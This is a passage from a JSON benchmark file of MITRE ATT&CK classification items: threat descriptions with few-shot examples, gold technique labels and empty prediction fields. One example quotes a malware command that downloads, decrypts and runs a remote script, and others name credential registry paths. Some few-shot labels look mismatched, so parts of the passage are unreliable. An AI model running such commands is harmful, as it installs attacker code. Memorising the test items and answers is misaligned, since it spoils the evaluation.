shell in the ZCS server while, at the same time, bypassing antivirus checks.\n\t - T1505.003: Server Software Component - Web Shell\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Between August 2 and 4, the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "APT12 has attempted to get victims to open malicious Microsoft Word and PDF attachment sent via spearphishing.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1574.012\n- Text: The shellcode loaded by the macro contains an encrypted DLL which is decrypted at runtime and then manually mapped into memory by the shellcode. After mapping the DLL, the shellcode jumps to the entry point of that DLL. The shellcode uses some kind of custom hashing method to resolve the APIs. We used hollows_hunter to dump the DLL and reconstruct the IAT once it is fully mapped into memory\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1620: Reflective Code Loading\n- Text: XCSSET adds malicious file paths to the \"DYLD_FRAMEWORK_PATH\" and \"DYLD_LIBRARY_PATH\" environment variables to execute malicious code.\n\t - T1574.006: Hijack Execution Flow - Dynamic Linker Hijacking\n", + "input": "Blue Mockingbird has used wmic.exe and Windows Registry modifications to set the COR_PROFILER environment variable to execute a malicious DLL whenever a process loads the .NET CLR.", + "gold": "- T1574.012: Hijack Execution Flow - COR_PROFILER", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects password policy information with the command net accounts.\n\t - T1201: Password Policy Discovery\n- Text: POWRUNER may collect user account information by running \"net user /domain\" or a series of other commands on a victim.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Finally, the loader spawns cmd.exe to perform a series of reconnaissance commands to obtain information about the network and domain\n\t - T1482: Domain Trust Discovery\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "PoshC2 can use \"Get-PassPol\" to enumerate the domain password policy.", + "gold": "- T1201: Password Policy Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called \u201cSandworm Team\u201d also\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Since this malicious extension is trying to pass for a legitimate Chrome plugin, Grandoreiro\u2019s developer named it \u201cGoogle Plugin\u201d version 1.5.0. Visually, it adds a square button to the browser window instead of the \u201ccookie\u201d button on the original plugin\n\t - T1176: Browser Extensions\n- Text: We suspect that the malware uses this extension to grab the victim\u2019s cookies and use them from another device to ride the victim\u2019s active session\n\t - T1539: Steal Web Session Cookie\n", + "input": "HEXANE has used a Mimikatz-based tool and a PowerShell script to steal passwords from Google Chrome.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Attor can download additional plugins, updates and other files.\n\t - T1105: Ingress Tool Transfer\n- Text: (Source: Dell SecureWorks) The following tools appear to be exclusive to TG-3390: OwaAuth web shell \u2014 A web shell and credential stealer deployed to Microsoft Exchange servers\n\t - T1059: Command and Scripting Interpreter\n\t - T1505.003: Server Software Component - Web Shell\n- Text: The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py The first part of the command downloads an encoded file from a Github page belonging to a user named youarenick\" and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.\"\n\t - T1553.001: Subvert Trust Controls - Gatekeeper Bypass\n", + "input": "Magic Hound has downloaded additional code and files from servers onto victims.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Finally, OverWatch observed AQUATIC PANDA make multiple attempts at credential harvesting by dumping the memory of the LSASS process3 using living-off-the-land binaries rdrleakdiag.exe and cdump.exe \u2014 a renamed copy of createdump.exe. The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\\temp\\ directories\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: A Threat Group-3390 tool can use WMI to execute a binary.\n\t - T1047: Windows Management Instrumentation\n- Text: IceApple's Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\\SECURITY\\Policy\\PolEKList\\default`, `HKLM\\SECURITY\\Policy\\Secrets\\*\\CurrVal`, and `HKLM\\SECURITY\\Policy\\Secrets\\*\\OldVal`.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n", + "input": "NotPetya contains a modified version of Mimikatz to help gather credentials that are later used for lateral movement.", + "gold": "- T1003.001: OS Credential Dumping - LSASS Memory", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BLINDINGCAN has attempted to hide its payload by using legitimate file names such as \"iconcache.db\".\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: In the PuTTY sample discovered on VirusTotal, the malicious code was inserted into the ssh2_userauth_process_queue function (source file: putty-0.77\\ssh\\userauth2-client.c). The code resides in the part of the function responsible for performing password authentication, as opposed to other methods such as public key or keyboard-interactive authentication. Once the user establishes a connection and enters their username and password, the malicious code is executed regardless of the authentication result.\n\t - T1480: Execution Guardrails\n- Text: DarkWatchman reports window names along with keylogger information to provide application context.\n\t - T1010: Application Window Discovery\n", + "input": "TEARDROP files had names that resembled legitimate Window file and directory names.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Remcos uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying.\n\t - T1090: Proxy\n- Text: The \"ZJ\" variant of BACKSPACE allows \"ZJ link\" infections with Internet access to relay traffic from \"ZJ listen\" to a command server.\n\t - T1090.001: Proxy - Internal Proxy\n- Text: Machete has used free dynamic DNS domains for C2.\n\t - T1568.001: Dynamic Resolution - Fast Flux DNS\n", + "input": "Cardinal RAT can act as a reverse proxy.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After the anti-analysis checks are complete, the loader starts preparing the infected environment for the downloading of additional payloads. There are 3 download attempts (and thus 3 GET requests trailing by a different numeric ID), the payloads are downloaded subsequently to the user\u2019s %temp% folder\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: FlawedAmmyy may obfuscate portions of the initial C2 handshake.\n\t - T1001: Data Obfuscation\n- Text: The Cannon Trojan is written in C# and functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server. To communicate with the C2 server, the Trojan will send emails to specific email addresses via SMTPS over TCP port 587\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "Trojan.Karagany can communicate with C2 via HTTP POST requests.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Group has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine.\n\t - T1204.001: User Execution - Malicious Link\n- Text: AADInternals can send \"consent phishing\" emails containing malicious links designed to steal users\u2019 access tokens.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n", + "input": "AppleJeus's spearphishing links required user interaction to navigate to the malicious website.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For Operation Honeybee, the threat actors used a Visual Basic script embedded within a Word document to download an implant.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Sandworm Team has tricked unwitting recipients into clicking on spearphishing attachments and enabling malicious macros embedded within files.\n\t - T1204.002: User Execution - Malicious File\n- Text: This attack begins with a spear phishing attack through a targeted email campaign. Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "SideCopy has sent Microsoft Office Publisher documents to victims that have embedded malicious macros that execute an hta file via calling `mshta.exe`.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mofang's malicious spearphishing attachments required a user to open the file after receiving.\n\t - T1204.002: User Execution - Malicious File\n- Text: APT33 has lured users to click links to malicious HTML applications delivered via spearphishing emails.\n\t - T1204.001: User Execution - Malicious Link\n- Text: SHA256 file hashes for 119 malspam attachments, 30 extracted Redaman executable files, and 30 dropped Redaman DLL files found from September through December 2018. Information is available at: https://github.com/pan-unit42/iocs/blob/master/Redaman_banking_malware/2018-09-thru-2018-12-file-hashes-for-Redaman-banking-malware.txt .\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n", + "input": "Taidoor has relied upon a victim to click on a malicious email attachment.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mivast has the capability to gather NTLM password information.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n- Text: RainyDay can use the QuarksPwDump tool to obtain local passwords and domain cached credentials.\n\t - T1555.004: Credentials from Password Stores - Windows Credential Manager\n- Text: PLEAD can harvest saved credentials from browsers such as Google Chrome, Microsoft Internet Explorer, and Mozilla Firefox.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", + "input": "Password stealer and NTLM stealer modules in CozyCar harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication.", + "gold": "- T1003.002: OS Credential Dumping - Security Account Manager", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Rifdoor has encrypted command and control (C2) communications with a stream cipher.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: The function will then download an encrypted file containing the final payload used in the campaign. The file is encrypted with a custom XOR-based algorithm, with the key 0x0AE2. In the latest versions, the authors moved from encryption to using a base64-encoded ZIP file\n\t - T1027: Obfuscated Files or Information\n- Text: 22 Keylogging and exfiltrating data The exfiltrated data is base64 that decodes into more custom encoded strings that appear to be \u201c/\u201d delimited\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1560: Archive Collected Data\n", + "input": "Ecipekac can use XOR, AES, and DES to encrypt loader shellcode.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has several modules that search the Windows Registry for stored credentials: Get-UnattendedInstallFile, Get-Webconfig, Get-ApplicationHost, Get-SiteListPassword, Get-CachedGPPPassword, and Get-RegistryAutoLogon.\n\t - T1552.002: Unsecured Credentials - Credentials in Registry\n- Text: is capable of accessing locally stored passwords on victims.\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n- Text: Carberp has captured credentials when a user performs login through a SSL session.\n\t - T1185: Browser Session Hijacking\n", + "input": "Agent Tesla has the ability to extract credentials from the Registry.", + "gold": "- T1552.002: Unsecured Credentials - Credentials in Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses HTTP and HTTPS for command and control.\n\t - T1071: Application Layer Protocol\n- Text: Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.\n\t - T1187: Forced Authentication\n- Text: NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and\u2014in most cases\u2014most effective method, uses a modified version of the Mimikatz tool to steal the user\u2019s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1. In this case, the malware attempts to identify other hosts on the network by checking the compromised system\u2019s IP physical address mapping table. Next, it scans for other systems that are vulnerable to the SMB exploit and installs the malicious payload. Refer to the malware report, MIFR-10130295, for more details on these methods\n\t - T1210: Exploitation of Remote Services\n", + "input": "Dragonfly 2.0 used SMB for C2.", + "gold": "- T1071: Application Layer Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: StrifeWater can download updates and auxiliary modules.\n\t - T1105: Ingress Tool Transfer\n- Text: WellMess can send files from the victim machine to C2.\n\t - T1005: Data from Local System\n- Text: Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n", + "input": "UPPERCUT can download and upload files to and from the victim\u2019s machine.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower\n\t - T1041: Exfiltration Over C2 Channel\n- Text: CORALDECK has exfiltrated data in HTTP POST headers.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: LightNeuron can be configured to exfiltrate data during nighttime or working hours.\n\t - T1029: Scheduled Transfer\n", + "input": "ADVSTORESHELL exfiltrates data over the same channel used for C2.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LiteDuke can securely delete files by first writing random data to the file.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Bazar's loader can delete scheduled tasks created by a previous instance of the malware.\n\t - T1070: Indicator Removal\n\t - T1070.009: Indicator Removal - Clear Persistence\n- Text: Out1 can use native command line for execution.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Zeus Panda can uninstall scripts and delete files to cover its track.", + "gold": "- T1070: Indicator Removal", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AdFind has the ability to query Active Directory for computers.\n\t - T1018: Remote System Discovery\n- Text: HyperStack can enumerate all account names on a remote share.\n\t - T1087.001: Account Discovery - Local Account\n- Text: Volgmer can gather information about TCP connection state.\n\t - T1049: System Network Connections Discovery\n", + "input": "yty uses the \"net view\" command for discovery.", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SodaMaster has the ability to download additional payloads from C2 to the targeted system.\n\t - T1105: Ingress Tool Transfer\n- Text: Wizard Spider has obtained and used publicly-available post-exploitation frameworks and tools like Metasploit, Empire, Mimikatz.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: GCMAN uses VNC for lateral movement.\n\t - T1021.005: Remote Services - VNC\n", + "input": "Fox Kitten has downloaded additional tools including PsExec directly to endpoints.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TRITON\u2019s TsLow python module pings controllers over the TriStation protocol.\n\t - T1018: Remote System Discovery\n- Text: has used brute force techniques to obtain credentials.\n\t - T1110: Brute Force\n- Text: has used RDP for.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n", + "input": "Dragonfly 2.0 likely obtained a list of hosts in the victim environment.", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN4 has used legitimate credentials to hijack email communications.\n\t - T1078: Valid Accounts\n- Text: NotPetya can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network.\n\t - T1210: Exploitation of Remote Services\n- Text: In Carbanak attacks, the groups\u2019 attacks can involve logging into services that accept remote connections and using stolen password hashes through the \u201cpass the hash\u201d method\n\t - T1550.002: Use Alternate Authentication Material - Pass the Hash\n\t - T1110.002: Brute Force - Password Cracking\n", + "input": "APT39 has used SMB for lateral movement.", + "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The DNS resolution is performed using DNS over HTTPS (DoH). The malware sends an HTTP POST request to a Google DNS Server (8.8.8.8) using the following headers\n\t - T1572: Protocol Tunneling\n- Text: Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 use a payload that uses raw TCP connections for this communication\n\t - T1071: Application Layer Protocol\n\t - T1049: System Network Connections Discovery\n- Text: SombRAT can communicate over DNS with the C2 server.\n\t - T1071.004: Application Layer Protocol - DNS\n", + "input": "Cobalt Strike uses a custom command and control protocol that can be encapsulated in HTTP or HTTPS, or DNS. All protocols use their standard assigned ports.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: EvilBunny has created Registry keys for persistence in \"[HKLM|HKCU]\\\u2026\\CurrentVersion\\Run\".\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Agent Tesla can achieve persistence by modifying Registry key entries.\n\t - T1112: Modify Registry\n- Text: installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "ShimRat has installed a registry based start-up key \"HKCU\\Software\\microsoft\\windows\\CurrentVersion\\Run\" to maintain persistence should other methods fail.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sakula uses single-byte XOR obfuscation to obfuscate many of its files.\n\t - T1027: Obfuscated Files or Information\n- Text: ShadowPad has encoded data as readable Latin characters.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n- Text: Squirrelwaffle has encoded its communications to C2 servers using Base64.\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "FunnyDream can Base64 encode its C2 address stored in a template binary with the `xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_-` or\n`xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_=` character sets.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Creates events \"__klg__\" and \"__klgkillsoft__\" to act as mutexes and facilitate self-removal. Installs itself to %APPDATA%\\Intel Corporation\\IAStorIcon.exe. Creates an entry in the user's Startup folder for persistence. Uses the SetWindowsHookExW API function to capture keystrokes system-wide. Formats and writes the keylogger output to %APPDATA%\\Update\\Tmp\\k%d.txt, where %d is the current system tick count\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: PoisonIvy creates a Registry key in the Active Setup pointing to a malicious executable.\n\t - T1547.014: Boot or Logon Autostart Execution - Active 